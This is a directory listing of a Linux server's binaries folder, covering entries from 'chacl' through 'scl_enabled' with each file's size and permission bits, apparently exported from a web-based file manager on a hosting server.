chacl File 19.14 KB 0755
chage File 71.98 KB 0755
chardetect File 225 B 0755
chattr File 15.19 KB 0755
chcat File 13.63 KB 0755
chcon File 60.24 KB 0755
checkmodule File 450.88 KB 0755
checkpolicy File 527.52 KB 0755
chfn File 31.29 KB 0711
chgrp File 56.19 KB 0755
chmem File 35.39 KB 0755
chmod File 56.16 KB 0755
choom File 23.3 KB 0755
chown File 60.19 KB 0755
chronyc File 100.7 KB 0755
chrt File 27.31 KB 0755
chsh File 23.23 KB 0711
chvt File 15.35 KB 0755
ci File 811 B 0755
cifsiostat File 23.55 KB 0755
circo File 15.23 KB 0755
cksum File 35.57 KB 0755
cl-linksafe-apply-group File 558 B 0755
cl-linksafe-reconfigure File 4.83 KB 0755
clear File 15.15 KB 0755
clockdiff File 23.2 KB 0755
cloud-id File 966 B 0755
cloud-init File 970 B 0755
cloud-init-per File 2.06 KB 0755
cluster File 47.7 KB 0755
cmp File 40.13 KB 0755
cmsutil File 47.37 KB 0755
co File 811 B 0755
cockpit-bridge File 213 B 0755
col File 23.23 KB 0755
colcrt File 15.19 KB 0755
colrm File 15.16 KB 0755
column File 35.34 KB 0755
comm File 35.75 KB 0755
command File 35 B 0755
compare File 15.1 KB 0755
compile_et File 1.31 KB 0755
composite File 15.1 KB 0755
config_data File 6.97 KB 0755
conjure File 15.1 KB 0755
convert File 15.1 KB 0755
coredumpctl File 59.85 KB 0755
corelist File 14.92 KB 0755
cp File 149.24 KB 0755
cpan File 8.37 KB 0755
cpan-mirrors File 4.19 KB 0755
cpansign File 1.98 KB 0755
cpapi1 File 3.36 MB 0755
cpapi2 File 3.36 MB 0755
cpapi3 File 3.36 MB 0755
cpio File 145.52 KB 0755
cpp File 1.05 MB 0755
cpupower File 79.98 KB 0755
crb File 2.59 KB 0744
crc32 File 1.02 KB 0755
crlutil File 91.98 KB 0755
cronnext File 39.75 KB 0755
crontab File 55.77 KB 4755
csplit File 108.88 KB 0755
curl File 248.48 KB 0755
cut File 47.8 KB 0755
cvtsudoers File 233.49 KB 0755
cxpm File 27.41 KB 0755
cyrusbdb2current File 1.58 MB 0755
datacopy File 31.43 KB 0755
date File 104.05 KB 0755
dbilogstrip File 1.35 KB 0755
dbiprof File 6.06 KB 0755
dbus-broker File 232 KB 0755
dbus-broker-launch File 130.02 KB 0755
dbus-monitor File 27.27 KB 0755
dbus-send File 27.22 KB 0755
dbus-update-activation-environment File 15.17 KB 0755
dbus-uuidgen File 15.14 KB 0755
dc File 48.42 KB 0755
dconf File 64.71 KB 0755
dd File 68.14 KB 0755
deallocvt File 15.36 KB 0755
debuginfo-install File 3.6 KB 0755
debuginfod-find File 19.26 KB 0755
defncopy File 31.43 KB 0755
delv File 45.38 KB 0755
desktop-file-edit File 98.61 KB 0755
desktop-file-install File 98.61 KB 0755
desktop-file-validate File 78.73 KB 0755
df File 84.73 KB 0755
diff File 194.7 KB 0755
diff3 File 52.3 KB 0755
diffimg File 15.26 KB 0755
dig File 136.59 KB 0755
dijkstra File 19.44 KB 0755
dir File 137.65 KB 0755
dircolors File 39.8 KB 0755
dirmngr File 439.97 KB 0755
dirmngr-client File 56.13 KB 0755
dirname File 31.48 KB 0755
display File 15.1 KB 0755
distro File 953 B 0755
dltest File 15.68 KB 0755
dmesg File 71.77 KB 0755
dnf File 2.04 KB 0755
dnf-3 File 2.04 KB 0755
dnf4 File 2.04 KB 0755
dnsdomainname File 23.84 KB 0755
dnstap-read File 23.19 KB 0755
domainname File 23.84 KB 0755
dos2unix File 56.15 KB 0755
dot File 15.23 KB 0755
dot2gxl File 39.93 KB 0755
dotty File 2.04 KB 0755
doveadm File 815.64 KB 0755
doveconf File 366.45 KB 0755
dovecot-sysreport File 5.81 KB 0755
dpkg File 320.52 KB 0755
dpkg-deb File 153.71 KB 0755
dpkg-divert File 129.77 KB 0755
dpkg-maintscript-helper File 20.63 KB 0755
dpkg-query File 146.16 KB 0755
dpkg-realpath File 35.63 KB 0755
dpkg-split File 104.76 KB 0755
dpkg-statoverride File 56.05 KB 0755
dpkg-trigger File 48.08 KB 0755
dracut File 98.55 KB 0755
dtrace File 17.38 KB 0755
du File 149.44 KB 0755
dumpkeys File 164.05 KB 0755
dwp File 851.56 KB 0755
dwz File 227.99 KB 0755
ea-php80 File 10.61 MB 0755
ea-php80-pear File 383 B 0755
ea-php80-pecl File 299 B 0755
ea-php81 File 10.8 MB 0755
ea-php81-pear File 383 B 0755
ea-php81-pecl File 299 B 0755
ea-php82 File 10.88 MB 0755
ea-php82-pear File 383 B 0755
ea-php82-pecl File 299 B 0755
ea-php83 File 10.93 MB 0755
ea-php83-pear File 383 B 0755
ea-php83-pecl File 299 B 0755
ea-wappspector File 104 B 0755
echo File 35.48 KB 0755
ed File 52.51 KB 0755
edgepaint File 2.46 MB 0755
egrep File 32 B 0755
eject File 43.61 KB 0755
elfedit File 35.84 KB 0755
elinks File 1.76 MB 0755
enc2xs File 40.69 KB 0755
encguess File 2.92 KB 0755
env File 44.23 KB 0755
envml File 4.11 KB 0755
envsubst File 35.39 KB 0755
eps2eps File 643 B 0755
eqn File 189.52 KB 0755
evmctl File 69.59 KB 0755
ex File 1.38 MB 0755
exempi File 28.18 KB 0755
exiv2 File 199.82 KB 0755
expand File 39.73 KB 0755
expr File 108.6 KB 0755
factor File 72.05 KB 0755
fallocate File 23.2 KB 0755
false File 27.47 KB 0755
fc File 30 B 0755
fc-cache File 139 B 0755
fc-cache-64 File 23.17 KB 0755
fc-cat File 19.16 KB 0755
fc-conflist File 15.13 KB 0755
fc-list File 15.13 KB 0755
fc-match File 15.13 KB 0755
fc-pattern File 15.14 KB 0755
fc-query File 15.13 KB 0755
fc-scan File 15.14 KB 0755
fc-validate File 15.14 KB 0755
fdp File 15.23 KB 0755
fg File 30 B 0755
fgconsole File 15.34 KB 0755
fgrep File 32 B 0755
filan File 47.63 KB 0755
file File 27.74 KB 0755
fincore File 23.3 KB 0755
find File 284.95 KB 0755
find-repos-of-install File 3.6 KB 0755
findmnt File 64.75 KB 0755
fips-finish-install File 1.72 KB 0755
fips-mode-setup File 8.02 KB 0755
firewall-cmd File 140.16 KB 0755
firewall-offline-cmd File 121.05 KB 0755
fisql File 35.47 KB 0755
flatpak File 1.75 MB 0755
flatpak-bisect File 7.66 KB 0755
flatpak-coredumpctl File 3.35 KB 0755
flex File 412.64 KB 0755
flex++ File 412.64 KB 0755
flock File 23.37 KB 0755
fmt File 39.77 KB 0755
fold File 39.71 KB 0755
formail File 48.38 KB 0755
fprintd-delete File 88.8 KB 0755
fprintd-enroll File 93.31 KB 0755
fprintd-list File 84.79 KB 0755
fprintd-verify File 92.82 KB 0755
free File 23.36 KB 0755
freebcp File 23.38 KB 0755
freetype-config File 4.32 KB 0755
fribidi File 28.59 KB 0755
ftp File 100.66 KB 0755
funzip File 31.25 KB 0755
fuse2fs File 72.68 KB 0755
fusermount File 35.52 KB 0755
g++ File 1.05 MB 0755
g13 File 110.29 KB 0755
gapplication File 23.21 KB 0755
gawk File 698.17 KB 0755
gc File 19.39 KB 0755
gcc File 1.04 MB 0755
gcc-ar File 27.67 KB 0755
gcc-nm File 27.64 KB 0755
gcc-ranlib File 27.67 KB 0755
gcov File 473.17 KB 0755
gcov-dump File 291.77 KB 0755
gcov-tool File 320.46 KB 0755
gdbm_dump File 28.22 KB 0755
gdbm_load File 36.48 KB 0755
gdbmtool File 149.26 KB 0755
gdbus File 51.5 KB 0755
gdbus-codegen File 1.99 KB 0755
gdk-pixbuf-query-loaders-64 File 15.16 KB 0755
gdk-pixbuf-thumbnailer File 19.14 KB 0755
gencat File 27.45 KB 0755
genl-ctrl-list File 15.48 KB 0755
geqn File 189.52 KB 0755
getconf File 35.23 KB 0755
getent File 35.86 KB 0755
getfacl File 31.8 KB 0755
getfattr File 24.35 KB 0755
getkeycodes File 15.34 KB 0755
getopt File 23.27 KB 0755
getopts File 35 B 0755
gettext File 35.35 KB 0755
gettext.sh File 5.07 KB 0755
gettextize File 41.25 KB 0755
ghostscript File 15.13 KB 0755
gio File 91.81 KB 0755
gio-querymodules-64 File 15.13 KB 0755
git File 4.06 MB 0755
git-receive-pack File 4.06 MB 0755
git-shell File 770.68 KB 0755
git-upload-archive File 4.06 MB 0755
git-upload-pack File 4.06 MB 0755
glib-compile-resources File 43.34 KB 0755
glib-compile-schemas File 51.47 KB 0755
glib-genmarshal File 40.14 KB 0755
glib-gettextize File 5.26 KB 0755
glib-mkenums File 30.08 KB 0755
gmake File 249.8 KB 0755
gml2gv File 47.78 KB 0755
gneqn File 916 B 0755
gnroff File 3.21 KB 0755
gobject-query File 15.17 KB 0755
gpasswd File 76.19 KB 4755
gpg File 1.07 MB 0755
gpg-agent File 342.27 KB 0755
gpg-card File 170.13 KB 0755
gpg-connect-agent File 84.75 KB 0755
gpg-error File 36.1 KB 0755
gpg-error-config File 1.98 KB 0755
gpg-wks-client File 129.55 KB 0755
gpg-wks-server File 113.33 KB 0755
gpg2 File 1.07 MB 0755
gpgconf File 100.98 KB 0755
gpgme-json File 84.63 KB 0755
gpgparsemail File 35.33 KB 0755
gpgrt-config File 13.13 KB 0755
gpgsplit File 27.5 KB 0755
gpgtar File 64.87 KB 0755
gpgv File 295.43 KB 0755
gpgv2 File 295.43 KB 0755
gpic File 201.72 KB 0755
gpio-event-mon File 18.13 KB 0755
gpio-hammer File 14.12 KB 0755
gpio-watch File 14.12 KB 0755
gprof File 101.48 KB 0755
gr2fonttest File 28 KB 0755
graphml2gv File 23.55 KB 0755
grep File 154.49 KB 0755
gresource File 23.28 KB 0755
groff File 96.77 KB 0755
grops File 167.26 KB 0755
grotty File 122.2 KB 0755
groups File 35.66 KB 0755
growpart File 29.2 KB 0755
grub2-editenv File 475.69 KB 0755
grub2-file File 1.1 MB 0755
grub2-fstest File 1.34 MB 0755
grub2-glue-efi File 294.55 KB 0755
grub2-kbdcomp File 1.63 KB 0755
grub2-menulst2cfg File 277.75 KB 0755
grub2-mkfont File 327.26 KB 0755
grub2-mkimage File 454.59 KB 0755
grub2-mklayout File 300.66 KB 0755
grub2-mknetdir File 517.62 KB 0755
grub2-mkpasswd-pbkdf2 File 307.05 KB 0755
grub2-mkrelpath File 294.38 KB 0755
grub2-mkrescue File 1.33 MB 0755
grub2-mkstandalone File 621.93 KB 0755
grub2-mount File 1.01 MB 0755
grub2-render-label File 1.11 MB 0755
grub2-script-check File 331.17 KB 0755
grub2-syslinux2cfg File 1.03 MB 0755
gs File 15.13 KB 0755
gsbj File 354 B 0755
gsdj File 356 B 0755
gsdj500 File 356 B 0755
gsettings File 31.38 KB 0755
gsf-office-thumbnailer File 20.07 KB 0755
gslj File 357 B 0755
gslp File 354 B 0755
gsnd File 281 B 0755
gsoelim File 32.18 KB 0755
gst-inspect-1.0 File 71.75 KB 0755
gst-launch-1.0 File 39.48 KB 0755
gst-stats-1.0 File 35.64 KB 0755
gst-typefind-1.0 File 19.34 KB 0755
gtar File 518.16 KB 0755
gtbl File 130.86 KB 0755
gtester File 31.29 KB 0755
gtester-report File 18.64 KB 0755
gtk-launch File 19.28 KB 0755
gtk-query-immodules-2.0-64 File 19.17 KB 0755
gtk-query-immodules-3.0-64 File 23.27 KB 0755
gtk-update-icon-cache File 39.83 KB 0755
gtroff File 732.07 KB 0755
gunzip File 2.29 KB 0755
gv2gml File 23.41 KB 0755
gv2gxl File 39.93 KB 0755
gvcolor File 49.59 KB 0755
gvgen File 23.41 KB 0755
gvmap File 2.75 MB 0755
gvmap.sh File 2.14 KB 0755
gvpack File 398.14 KB 0755
gvpr File 15.2 KB 0755
gxl2dot File 39.93 KB 0755
gxl2gv File 39.93 KB 0755
gzexe File 6.3 KB 0755
gzip File 89.63 KB 0755
h2ph File 28.69 KB 0755
h2xs File 59.5 KB 0755
hardlink File 35.43 KB 0755
hash File 32 B 0755
hb-ot-shape-closure File 43.66 KB 0755
hb-shape File 47.91 KB 0755
hb-subset File 39.66 KB 0755
hb-view File 64.01 KB 0755
head File 43.8 KB 0755
hesinfo File 15.7 KB 0755
hex2hcd File 19.05 KB 0755
hexdump File 51.41 KB 0755
host File 108.57 KB 0755
hostid File 31.66 KB 0755
hostname File 23.84 KB 0755
hostnamectl File 31.49 KB 0755
htdbm File 38.53 KB 0755
htdigest File 25.71 KB 0755
html2text File 980 B 0755
htpasswd File 38.66 KB 0755
httxt2dbm File 24.73 KB 0755
hunspell File 102.67 KB 0755
i386 File 27.48 KB 0755
ibd2sdi File 326.05 KB 0755
iconv File 64.09 KB 0755
icu-config File 205 B 0755
icu-config-64 File 21.67 KB 0755
icuinfo File 15.49 KB 0755
id File 39.71 KB 0755
ident File 27.73 KB 0755
identify File 15.11 KB 0755
idiag-socket-details File 15.52 KB 0755
idn File 36.46 KB 0755
ifnames File 4.03 KB 0755
iio_event_monitor File 30.13 KB 0755
iio_generic_buffer File 34.14 KB 0755
im360-k8s-syncer File 56.02 MB 0755
ima-add-sigs File 3.67 KB 0755
ima-setup File 3.71 KB 0755
import File 15.1 KB 0755
imunify-agent-proxy File 12.53 MB 0755
imunify-antivirus File 1 KB 0755
imunify-fgw-dump File 5.82 MB 0755
imunify-service File 1020 B 0755
imunify360-agent File 1 KB 0755
imunify360-command-wrapper File 9.14 KB 0755
info File 312.73 KB 0755
infocmp File 63.68 KB 0755
infotocap File 87.79 KB 0755
innochecksum File 229.06 KB 0755
install File 149.29 KB 0755
instmodsh File 4.1 KB 0755
intel-speed-select File 112.66 KB 0755
ionice File 15.21 KB 0755
iostat File 55.86 KB 0755
ipcalc File 56.09 KB 0755
ipcmk File 23.29 KB 0755
ipcrm File 19.23 KB 0755
ipcs File 39.34 KB 0755
iptc File 29.3 KB 0755
irqtop File 35.27 KB 0755
isosize File 15.16 KB 0755
ispell File 992 B 0755
isql File 40.01 KB 0755
iusql File 31.95 KB 0755
jobs File 32 B 0755
join File 51.9 KB 0755
journalctl File 88.11 KB 0755
jq File 31.17 KB 0755
json_pp File 4.78 KB 0755
json_reformat File 19.52 KB 0755
json_verify File 15.3 KB 0755
json_xs File 6.85 KB 0755
jsondiff File 1021 B 0755
jsondiff-3 File 1021 B 0755
jsondiff-3.9 File 1021 B 0755
jsonpatch File 3.58 KB 0755
jsonpatch-3 File 3.58 KB 0755
jsonpatch-3.9 File 3.58 KB 0755
jsonpointer File 1.8 KB 0755
jsonpointer-3 File 1.8 KB 0755
jsonpointer-3.9 File 1.8 KB 0755
jsonschema File 973 B 0755
kbd_mode File 15.69 KB 0755
kbdinfo File 19.38 KB 0755
kbdrate File 19.38 KB 0755
kdumpctl File 51.85 KB 0755
kernel-install File 13.7 KB 0755
keyctl File 64.02 KB 0755
kill File 31.29 KB 0755
killall File 32.95 KB 0755
kmod File 165.57 KB 0755
krb5-config File 6.59 KB 0755
kvm_stat File 62.92 KB 0755
l2ping File 15.16 KB 0755
last File 35.3 KB 0755
lastb File 35.3 KB 0755
lastcomm File 32.42 KB 0755
lastlog File 28.63 KB 0755
lchfn File 23.13 KB 0755
lchsh File 23.13 KB 0755
ld File 1.71 MB 0755
ld.bfd File 1.71 MB 0755
ld.gold File 2.03 MB 0755
ld.so File 910.97 KB 0755
ldd File 5.32 KB 0755
lefty File 300.45 KB 0755
less File 197.7 KB 0755
lessecho File 15.17 KB 0755
lesskey File 24.61 KB 0755
lesspipe.sh File 3.5 KB 0755
lex File 412.64 KB 0755
lexgrog File 88.19 KB 0755
libnetcfg File 15.41 KB 0755
libpng-config File 2.38 KB 0755
libpng16-config File 2.38 KB 0755
libtool File 359.18 KB 0755
libtoolize File 126.17 KB 0755
libwmf-fontmap File 13.03 KB 0755
link File 31.66 KB 0755
links File 1.76 MB 0755
linux-boot-prober File 5.86 KB 0755
linux32 File 27.48 KB 0755
linux64 File 27.48 KB 0755
ln File 60.16 KB 0755
lneato File 1.51 KB 0755
loadkeys File 200.52 KB 0755
loadunimap File 31.61 KB 0755
locale File 59.08 KB 0755
localectl File 31.45 KB 0755
localedef File 314.06 KB 0755
locate File 40.09 KB 0711
lockfile File 19.85 KB 0755
logger File 35.98 KB 0755
login File 43.45 KB 0755
loginctl File 67.96 KB 0755
logname File 31.66 KB 0755
logresolve File 25.06 KB 0755
look File 19.17 KB 0755
ls File 137.64 KB 0755
lsattr File 15.18 KB 0755
lsblk File 124.37 KB 0755
lscpu File 108.21 KB 0755
lsgpio File 14.3 KB 0755
lsiio File 22.14 KB 0755
lsinitrd File 11.85 KB 0755
lsipc File 51.5 KB 0755
lsirq File 23.23 KB 0755
lslocks File 31.6 KB 0755
lslogins File 51.51 KB 0755
lsmcli File 381 B 0755
lsmd File 31.72 KB 0755
lsmem File 35.53 KB 0755
lsns File 39.33 KB 0755
lsof File 175.06 KB 0755
lsphp File 937 B 0755
lsphp74 File 8.08 MB 0755
lsscsi File 89.44 KB 0755
lsusb File 252.27 KB 0755
lsusb.py File 14.19 KB 0755
lto-dump File 26.59 MB 0755
lua File 23.23 KB 0755
luac File 157.69 KB 0755
lwp-download File 10.05 KB 0755
lwp-dump File 2.65 KB 0755
lwp-mirror File 2.36 KB 0755
lwp-request File 15.82 KB 0755
lz4_decompress File 127.2 KB 0755
m4 File 240.4 KB 0755
mac2unix File 56.15 KB 0755
mail File 1013.25 KB 0755
mailstat File 5.72 KB 0755
mailx File 1013.25 KB 0755
mailx.s-nail File 1013.25 KB 0755
make File 249.8 KB 0755
make-dummy-cert File 614 B 0755
man File 114.91 KB 0755
man-recode File 28.01 KB 0755
man.man-db File 114.91 KB 0755
mandb File 133.01 KB 0755
manpath File 31.82 KB 0755
mapscrn File 31.57 KB 0755
mcookie File 27.31 KB 0755
md5sum File 39.64 KB 0755
mdb_copy File 15.7 KB 0755
mdb_dump File 15.84 KB 0755
mdb_load File 23.84 KB 0755
mdb_stat File 15.8 KB 0755
mdig File 51.3 KB 0755
memcached File 240.73 KB 0755
memcached-tool File 6.05 KB 0755
merge File 31.9 KB 0755
mesg File 15.14 KB 0755
miniterm-3.9.py File 34.28 KB 0755
miniterm-3.py File 34.28 KB 0755
miniterm.py File 34.28 KB 0755
mkdir File 68.31 KB 0755
mkfifo File 39.83 KB 0755
mkfontdir File 69 B 0755
mkfontscale File 44.77 KB 0755
mknod File 43.88 KB 0755
mktemp File 39.8 KB 0755
mm2gv File 39.45 KB 0755
mmdblookup File 27.72 KB 0755
modulecmd File 654.01 KB 0755
modulemd-validator File 28.39 KB 0755
modutil File 91.91 KB 0755
mogrify File 15.1 KB 0755
montage File 15.1 KB 0755
more File 43.43 KB 0755
mount File 47.34 KB 0755
mountpoint File 19.18 KB 0755
mpris-proxy File 101.09 KB 0755
mpstat File 51.79 KB 0755
msgattrib File 27.17 KB 0755
msgcat File 27.14 KB 0755
msgcmp File 27.27 KB 0755
msgcomm File 27.16 KB 0755
msgconv File 23.15 KB 0755
msgen File 23.15 KB 0755
msgexec File 23.15 KB 0755
msgfilter File 35.31 KB 0755
msgfmt File 84.09 KB 0755
msggrep File 116.41 KB 0755
msginit File 67.44 KB 0755
msgmerge File 75.48 KB 0755
msgunfmt File 35.33 KB 0755
msguniq File 23.15 KB 0755
mv File 141.17 KB 0755
my_print_defaults File 224.91 KB 0755
myisam_ftdump File 6.3 MB 0755
myisamchk File 6.48 MB 0755
myisamlog File 6.32 MB 0755
myisampack File 6.35 MB 0755
mysql File 7.15 MB 0755
mysql_config File 843 B 0755
mysql_config-64 File 4.93 KB 0755
mysql_config_editor File 210.39 KB 0755
mysql_migrate_keyring File 6.95 MB 0755
mysql_secure_installation File 6.87 MB 0755
mysql_ssl_rsa_setup File 254.22 KB 0755
mysql_tzinfo_to_sql File 130.64 KB 0755
mysql_upgrade File 6.96 MB 0755
mysqladmin File 6.89 MB 0755
mysqlbinlog File 7.19 MB 0755
mysqlcheck File 6.9 MB 0755
mysqld_pre_systemd File 4.32 KB 0755
mysqldump File 6.97 MB 0755
mysqldumpslow File 7.54 KB 0755
mysqlimport File 6.88 MB 0755
mysqlpump File 7.35 MB 0755
mysqlshow File 6.87 MB 0755
mysqlslap File 6.89 MB 0755
nail File 1013.25 KB 0755
named-rrchecker File 23.14 KB 0755
namei File 23.23 KB 0755
nano File 346.2 KB 0755
nc File 416.31 KB 0755
ncat File 416.31 KB 0755
ncurses6-config File 8.13 KB 0755
ncursesw6-config File 8.13 KB 0755
ndptool File 27.42 KB 0755
neato File 15.23 KB 0755
needs-restarting File 3.6 KB 0755
neqn File 916 B 0755
netstat File 156.85 KB 0755
newgidmap File 41.95 KB 0755
newgrp File 40.77 KB 0755
newuidmap File 37.93 KB 0755
nf-ct-add File 15.89 KB 0755
nf-ct-events File 15.33 KB 0755
nf-ct-list File 15.93 KB 0755
nf-exp-add File 20.3 KB 0755
nf-exp-delete File 16.09 KB 0755
nf-exp-list File 15.93 KB 0755
nf-log File 15.31 KB 0755
nf-monitor File 15.33 KB 0755
nf-queue File 15.32 KB 0755
ngettext File 35.34 KB 0755
nice File 35.67 KB 0755
nisdomainname File 23.84 KB 0755
nl File 100.71 KB 0755
nl-addr-add File 15.77 KB 0755
nl-addr-delete File 15.82 KB 0755
nl-addr-list File 19.84 KB 0755
nl-class-add File 15.75 KB 0755
nl-class-delete File 15.66 KB 0755
nl-class-list File 15.63 KB 0755
nl-classid-lookup File 15.5 KB 0755
nl-cls-add File 19.81 KB 0755
nl-cls-delete File 15.73 KB 0755
nl-cls-list File 15.69 KB 0755
nl-fib-lookup File 15.52 KB 0755
nl-link-enslave File 15.29 KB 0755
nl-link-ifindex2name File 15.29 KB 0755
nl-link-list File 15.67 KB 0755
nl-link-name2ifindex File 15.29 KB 0755
nl-link-release File 15.29 KB 0755
nl-link-set File 15.74 KB 0755
nl-link-stats File 15.53 KB 0755
nl-list-caches File 15.3 KB 0755
nl-list-sockets File 15.29 KB 0755
nl-monitor File 15.48 KB 0755
nl-neigh-add File 15.66 KB 0755
nl-neigh-delete File 15.7 KB 0755
nl-neigh-list File 15.61 KB 0755
nl-neightbl-list File 15.45 KB 0755
nl-nh-list File 15.48 KB 0755
nl-pktloc-lookup File 15.53 KB 0755
nl-qdisc-add File 15.7 KB 0755
nl-qdisc-delete File 15.66 KB 0755
nl-qdisc-list File 19.69 KB 0755
nl-route-add File 19.84 KB 0755
nl-route-delete File 19.91 KB 0755
nl-route-get File 15.31 KB 0755
nl-route-list File 15.86 KB 0755
nl-rule-list File 15.48 KB 0755
nl-tctree-list File 15.6 KB 0755
nl-util-addr File 15.29 KB 0755
nm File 44.73 KB 0755
nm-online File 23.38 KB 0755
nmcli File 1.03 MB 0755
nmtui File 838.46 KB 0755
nmtui-connect File 838.46 KB 0755
nmtui-edit File 838.46 KB 0755
nmtui-hostname File 838.46 KB 0755
nohup File 35.58 KB 0755
nop File 15.33 KB 0755
notify-send File 19.75 KB 0755
nproc File 35.69 KB 0755
nroff File 3.21 KB 0755
nsenter File 27.48 KB 0755
nslookup File 112.52 KB 0755
nss-policy-check File 15.16 KB 0755
nsupdate File 71.8 KB 0755
numfmt File 55.83 KB 0755
objcopy File 185.37 KB 0755
objdump File 413.11 KB 0755
od File 64.06 KB 0755
odbc_config File 15.7 KB 0755
odbcinst File 23.9 KB 0755
openssl File 1.07 MB 0755
openvt File 23.73 KB 0755
orc-bugreport File 23.31 KB 0755
os-prober File 5.78 KB 0755
osage File 15.23 KB 0755
osinfo-db-export File 27.35 KB 0755
osinfo-db-import File 27.3 KB 0755
osinfo-db-path File 15.3 KB 0755
osinfo-db-validate File 23.4 KB 0755
osinfo-detect File 27.4 KB 0755
osinfo-install-script File 31.77 KB 0755
osinfo-query File 32.19 KB 0755
osql File 9.48 KB 0755
p11-kit File 188.31 KB 0755
package-cleanup File 3.6 KB 0755
page_owner_sort File 26.13 KB 0755
pango-list File 19.11 KB 0755
pango-segmentation File 19.13 KB 0755
pango-view File 60.17 KB 0755
paperconf File 15.8 KB 0755
passwd File 31.89 KB 4755
paste File 35.58 KB 0755
patch File 195.02 KB 0755
patchwork File 15.23 KB 0755
pathchk File 35.66 KB 0755
pcre-config File 2.09 KB 0755
pcre2-config File 1.91 KB 0755
pdf2dsc File 701 B 0755
pdf2ps File 913 B 0755
pdns_control File 479.87 KB 0755
pdnsutil File 4.82 MB 0755
peekfd File 15.8 KB 0755
perl File 15.13 KB 0755
perl5.32.1 File 15.13 KB 0755
perlbug File 43.81 KB 0755
perldoc File 118 B 0755
perlivp File 10.56 KB 0755
perlml File 14.49 KB 0755
perlthanks File 43.81 KB 0755
perror File 1002.42 KB 0755
pf2afm File 502 B 0755
pfbtopfa File 520 B 0755
pflags File 2.56 KB 0755
pftp File 100.66 KB 0755
pgrep File 31.42 KB 0755
php File 937 B 0755
php74 File 8.08 MB 0755
php74-cgi File 8.07 MB 0755
php74-pear File 393 B 0755
php74-phar File 14.55 KB 0755
pic File 201.72 KB 0755
piconv File 8.08 KB 0755
pidof File 23.33 KB 0755
pidstat File 51.8 KB 0755
pidwait File 31.42 KB 0755
pigz File 132.84 KB 0755
pinfo File 102.27 KB 0755
ping File 89.33 KB 0755
pinky File 35.61 KB 0755
pipewire File 15.14 KB 0755
pipewire-aes67 File 15.14 KB 0755
pipewire-avb File 15.14 KB 0755
pipewire-pulse File 15.14 KB 0755
pipewire-vulkan File 15.14 KB 0755
pk12util File 72.42 KB 0755
pkaction File 19.16 KB 0755
pkcheck File 23.17 KB 0755
pkcon File 63.74 KB 0755
pkexec File 31.18 KB 0755
pkg-config File 335 B 0755
pkgconf File 45.36 KB 0755
pkill File 31.42 KB 0755
pkla-admin-identities File 23.96 KB 0755
pkla-check-authorization File 36.1 KB 0755
pkmon File 27.63 KB 0755
pkttyagent File 23.16 KB 0755
pl2pm File 4.43 KB 0755
pldd File 23.37 KB 0755
plesk_configure File 346 B 0755
pmap File 35.39 KB 0755
png-fix-itxt File 15.11 KB 0755
pngfix File 59.56 KB 0755
pod2html File 4.04 KB 0755
pod2man File 14.68 KB 0755
pod2text File 10.55 KB 0755
pod2usage File 4.01 KB 0755
podchecker File 3.57 KB 0755
post-grohtml File 199.76 KB 0755
powernow-k8-decode File 14.13 KB 0755
pphs File 408 B 0755
pr File 72.28 KB 0755
pre-grohtml File 92.92 KB 0755
precat File 5.53 KB 0755
preconv File 56.27 KB 0755
preunzip File 5.53 KB 0755
prezip File 5.53 KB 0755
prezip-bin File 15.69 KB 0755
printafm File 399 B 0755
printenv File 31.47 KB 0755
printf File 51.77 KB 0755
prlimit File 27.76 KB 0755
procan File 35.43 KB 0755
procmail File 118.11 KB 0755
protoc File 23.32 KB 0755
protoc-c File 158.2 KB 0755
protoc-gen-c File 158.2 KB 0755
prove File 13.24 KB 0755
prtstat File 23.84 KB 0755
prune File 15.41 KB 0755
ps File 141.15 KB 0755
ps2ascii File 635 B 0755
ps2epsi File 1.24 KB 0755
ps2pdf File 276 B 0755
ps2pdf12 File 219 B 0755
ps2pdf13 File 219 B 0755
ps2pdf14 File 219 B 0755
ps2pdfwr File 1.06 KB 0755
ps2ps File 651 B 0755
ps2ps2 File 673 B 0755
psfaddtable File 31.43 KB 0755
psfgettable File 31.43 KB 0755
psfstriptable File 31.43 KB 0755
psfxtable File 31.43 KB 0755
pslog File 15.7 KB 0755
pstree File 36.9 KB 0755
pstree.x11 File 36.9 KB 0755
ptar File 3.39 KB 0755
ptardiff File 2.49 KB 0755
ptargrep File 4.2 KB 0755
ptx File 129.03 KB 0755
pw-jack File 1.32 KB 0755
pwd File 35.7 KB 0755
pwdx File 15.28 KB 0755
pwmake File 15.7 KB 0755
pwscore File 15.7 KB 0755
pydoc File 78 B 0755
pydoc3 File 78 B 0755
pydoc3.9 File 78 B 0755
pyinotify File 968 B 0755
python File 15.09 KB 0755
python-html2text File 980 B 0755
python3 File 15.09 KB 0755
python3-html2text File 980 B 0755
python3.9 File 15.09 KB 0755
qemu-ga File 1.81 MB 0755
quota File 81.67 KB 0755
quotasync File 64.88 KB 0755
ranlib File 56 KB 0755
rcs File 198.1 KB 0755
rcsclean File 829 B 0755
rcsdiff File 826 B 0755
rcsfreeze File 4.34 KB 0755
rcsmerge File 829 B 0755
read File 32 B 0755
readelf File 667.29 KB 0755
readlink File 39.69 KB 0755
realpath File 39.77 KB 0755
recode-sr-latin File 15.13 KB 0755
red File 92 B 0755
rename File 23.23 KB 0755
renew-dummy-cert File 729 B 0755
renice File 15.16 KB 0755
repo-graph File 3.6 KB 0755
repoclosure File 3.6 KB 0755
repodiff File 3.6 KB 0755
repomanage File 3.6 KB 0755
repoquery File 3.6 KB 0755
reposync File 3.6 KB 0755
repotrack File 3.6 KB 0755
rescan-scsi-bus.sh File 38.09 KB 0755
reset File 27.34 KB 0755
resizecons File 27.55 KB 0755
rev File 15.16 KB 0755
rkhunter File 562.17 KB 0755
rlog File 817 B 0755
rm File 60.21 KB 0755
rmdir File 43.61 KB 0755
rnano File 346.2 KB 0755
rpcbind File 59.89 KB 0755
rpcinfo File 35.58 KB 0755
rpm File 23.63 KB 0755
rpm2archive File 23.32 KB 0755
rpm2cpio File 15.12 KB 0755
rpmdb File 19.74 KB 0755
rpmkeys File 15.59 KB 0755
rpmquery File 23.63 KB 0755
rpmverify File 23.63 KB 0755
rsvg-convert File 23.15 KB 0755
rsync File 558.48 KB 0755
rsync-ssl File 5.01 KB 0755
run-parts File 1.94 KB 0755
run-with-aspell File 89 B 0755
runcon File 35.65 KB 0755
rvi File 1.38 MB 0755
rview File 1.38 MB 0755
rvim File 3.84 MB 0755
s-nail File 1013.25 KB 0755
sadf File 459.02 KB 0755
sar File 135.88 KB 0755
sasl2-sample-client File 23.39 KB 0755
sasl2-sample-server File 23.21 KB 0755
scalar File 819.34 KB 0755
sccmap File 23.37 KB 0755
scl File 39.55 KB 0755
scl_enabled File 262 B 0755
